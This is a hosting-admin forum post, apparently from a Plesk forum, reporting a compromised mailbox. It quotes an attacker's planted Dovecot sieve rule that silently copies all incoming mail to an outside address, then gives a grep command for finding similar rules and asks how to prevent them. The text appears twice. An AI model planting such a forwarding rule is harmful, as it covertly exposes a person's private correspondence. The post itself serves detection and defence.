tkalfaoglu
Silver Pleskian
Today a customer complained that their email might be compromised.
I found that a single email address had a sieve added:
.dovecot.sieve -> sieve/roundcube.sieve
and that file contained:
# rule:[.]
if allof (header :contains "from" "@")
{
redirect :copy "[email protected]";
}
require ["copy"];
PS: You may wish to do a check of your systems, just do a:
cd /var/qmail/mailnames
find . -name roundcube.sieve -exec echo grep redirect {} \;
My question was this: I guess they got the person's email address and using webmail, added a redirect. How can this be prevented?
Thanks, -tk
I found that a single email address had a sieve added:
.dovecot.sieve -> sieve/roundcube.sieve
and that file contained:
# rule:[.]
if allof (header :contains "from" "@")
{
redirect :copy "[email protected]";
}
require ["copy"];
PS: You may wish to do a check of your systems, just do a:
cd /var/qmail/mailnames
find . -name roundcube.sieve -exec echo grep redirect {} \;
My question was this: I guess they got the person's email address and using webmail, added a redirect. How can this be prevented?
Thanks, -tk